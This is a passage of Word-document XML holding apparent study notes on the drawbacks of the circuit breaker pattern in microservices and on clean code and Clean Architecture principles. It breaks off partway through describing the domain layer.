        </w:rPr>
        <w:t>why</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> the failure is happening.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3A0B3C"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make </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>root cause analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> more difficult, as the circuit breaker might simply mask the issue without helping developers to understand the underlying problem, especially if there's no comprehensive logging or monitoring in place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCDFFC5"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Risk of "Recovery Storm"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDA15E3"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If the circuit breaker opens and the service is temporarily unavailable, once the breaker closes (i.e., allows requests again), the system might get flooded with a sudden surge of requests, potentially overwhelming the recovering service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45867FD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This can lead to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>recovery storm</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>, where the system might fail again because it can't handle the influx of traffic that it wasn’t prepared for. Without proper throttling or rate-limiting, this can lead to repeated failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E2C41A"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Increased Complexity in Service Dependency Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D89FC5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As microservices interact with one another, the use of circuit breakers increases the complexity of managing service dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A2D98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When one service fails, it might trigger circuit breakers in multiple other services. This can create a chain reaction, making it harder to isolate issues and requiring careful orchestration of service dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8082F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Overhead in Maintenance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502CECB6"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Circuit breaker logic, configuration, and monitoring add extra layers to the application’s architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6681D7AF"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Maintaining the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>circuit breaker code</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> and its configurations, handling state transitions (open, closed, half-open), and managing the various failure recovery mechanisms can add complexity to the system, especially when the architecture scales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3C3F0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False Sense of Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084B8D7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Relying on a circuit breaker might lead to complacency, where developers and teams believe that the system is always resilient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557F13D4"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>circuit breaker is not a silver bullet</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>. It can prevent immediate failure propagation, but it doesn’t resolve the underlying issues in the system. If the root cause is not fixed, the circuit breaker will continue to open, and the issue will persist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072880B0"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Partial Failures Are Not Fully Mitigated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DD9D2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A circuit breaker helps in cases of total service failure but does not deal with partial failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE2CA5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For example, if a service is still available but is slow or returning partial data, the circuit breaker might not be triggered, and the microservice could still suffer from degraded performance. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>slow service</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> might continue to impact other services in the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567A52E3"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Difficult Recovery Path in Complex Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCAA708"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roblem</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: Once a service goes down and the circuit breaker trips, it may be challenging to gracefully transition back to a fully operational state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5276AC3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equence</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: In complex systems with interdependent services, simply closing the circuit and restarting traffic flow may not be enough. Additional logic is needed to ensure a smooth and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>controlled recovery</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB93FFA"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pict w14:anchorId="235B3F37">
          <v:rect id="_x0000_i7535" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D821AD"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C90CB1B"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While the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Circuit Breaker</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> pattern provides essential fault tolerance, it comes with certain </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>disadvantages</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">, including premature tripping, complexity in configuration, increased latency, and potential recovery challenges. It is </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>important to combine it with proper monitoring, logging, and fine-tuning of thresholds to maximize its benefits and minimize the negative impact on overall system performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CC9BCE" w14:textId="77777777" w:rsidR="000B09B5" w:rsidRDefault="000B09B5" w:rsidP="000B09B5">
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="7E94EED4">
          <v:rect id="_x0000_i7530" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3982153D"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bookmarkStart w:id="742" w:name="_Toc197867956"/>
      <w:r w:rsidRPr="00585F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain the clean code architecture / strategy / principals</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="742"/>
    </w:p>
    <w:p w14:paraId="4E75921C" w14:textId="77777777" w:rsidR="000B09B5" w:rsidRPr="00FB6F10" w:rsidRDefault="000B09B5" w:rsidP="00585F60">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Clean Code Architecture, often referred to as Uncle Bob's Clean Architecture, is a software design approach that emphasizes maintainable, readable, and scalable code. It focuses on creating a system that is flexible, testable, and easy to understand by following a set of principles that prioritize code cleanliness, separation of concerns, and decoupling of components. Here's an in-depth look at the Clean Code principles, architecture, and strategies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F732AE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Clean Code Principles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50423EA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These principles ensure that the code remains maintainable, understandable, and extensible. Clean code should be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186B73B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Readable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D436A3A"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scriptive Naming</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Use clear, meaningful names for variables, methods, classes, and functions. Names should indicate the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>intent</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4F341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mall Functions/Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Functions should do one thing and do it well. They should be small (preferably fewer than 20 lines) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>not too complex</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8E74D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sistent Formatting</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: Follow consistent formatting conventions such as indentation, whitespace, and blank lines to visually separate code blocks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2724C960"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Simple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494E31FB"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Avoid Over-Engineering</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Don’t complicate things. Keep the code </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>as simple as possible</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>, focusing on the minimum viable solution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E0364F"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KISS (Keep It Simple, Stupid)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: A fundamental principle of Clean Code is to avoid unnecessary complexity. Always prefer </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>simple solutions</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> that are easy to understand and maintain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F90638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 Testable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7146B19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Write Testable Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Clean code encourages the writing of </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>testable</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> code by adhering to principles such as separation of concerns and low coupling. Write unit tests to validate the code’s behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4017EA9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OLID Principles</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: By following the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>SOLID</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> principles, you ensure that the code is easy to test and maintain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70904D2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d. Refactorable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEC628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ntinuous Refactoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: As requirements evolve, you should </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>refactor</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> your code to improve its structure and reduce technical debt. Refactoring should be a part of the regular development process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098D9A76"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 Avoid Duplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186B4F4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RY (Don’t Repeat Yourself)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: Duplication in code increases the likelihood of errors and makes maintenance difficult. Use abstraction to eliminate redundancy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CC0E6F"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f. Clear Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A529D6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raceful Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Code should handle errors appropriately. This includes </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>clear exception handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>, meaningful error messages, and ensuring that errors don’t propagate unhandled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6D5387"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pict w14:anchorId="329B30A7">
          <v:rect id="_x0000_i7536" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="732A5D72"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Clean Architecture Strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4FE4E9"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Architecture is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>layered</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> architecture that separates concerns and isolates dependencies to make software more modular and maintainable. The core idea is that </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>the business logic should not depend on the frameworks</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>, UI, or external systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030D9A49"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The Onion Model: Layers of the system are arranged in a concentric model. The innermost circle is the most abstract and contains the core business logic. As you move outwards, the layers become more concrete and include things like data access and UI components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE49B9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re</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Domain Layer): Contains </w:t>
      </w:r>
